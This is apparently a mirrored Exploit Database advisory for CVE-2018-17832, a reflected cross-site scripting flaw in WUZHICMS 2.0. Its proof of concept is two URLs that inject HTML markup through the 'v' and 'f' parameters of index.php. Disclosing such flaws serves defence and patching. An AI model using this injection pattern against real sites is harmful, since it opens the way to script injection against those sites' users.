WUZHICMS 2.0 – Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： Renzi
  日期： 2018-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45514/

• # Title: WUZHICMS 2.0 - Cross-Site Scripting 
  # Author: Felipe "Renzi" Gabriel
  # Date: 2018-10-01
  # Vendor: http://www.wuzhicms.com
  # Software: WUZHICMS 2.0
  # CVE: CVE-2018-17832
   
  # Technical Details & Description:
  # A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0web-application.
  # The vulnerability is located in the 'v' and'f' parameters of the`index.php` action GET method request.
   
  # PoC
  
  http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
  
  http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>